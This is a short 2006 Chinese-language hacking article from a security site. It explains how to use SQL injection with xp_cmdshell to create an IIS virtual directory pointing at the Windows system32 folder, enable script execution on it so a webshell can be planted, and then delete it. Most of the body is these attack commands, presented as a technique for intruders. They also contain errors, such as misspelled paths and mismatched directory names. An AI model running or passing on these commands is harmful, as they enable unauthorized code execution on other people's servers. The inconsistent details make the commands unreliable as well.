| 取得SQL注入建立虚拟目录 |
|
| 作者:佚名 来源:安全在线
更新时间:2006-6-4 0:36:05 【字体:小
大】 |
|
<%=(int(rnd()*1)+1)%>您当前的位置:中国安全在线cnsafer.com 请进入[技术论坛]发表评论 我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错: exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"’ 建立虚拟目录win,指向c:\winnt\system32 exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture’ 让win句有解析asp脚本权限
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/" 删除虚拟目录。 找不到web绝对路径的一种解决办法,
http://21o.net/h4x0r 403错误,表示虚拟目录建好了。。。
您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力 |
| 文章录入:冰峰杀手Ⅱ 责任编辑:冰峰杀手Ⅱ
|
|
上一篇文章: 破坏程序教学
下一篇文章: 黑客Web欺骗的工作原理和解决方案 |
| 【字体:小
大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】
|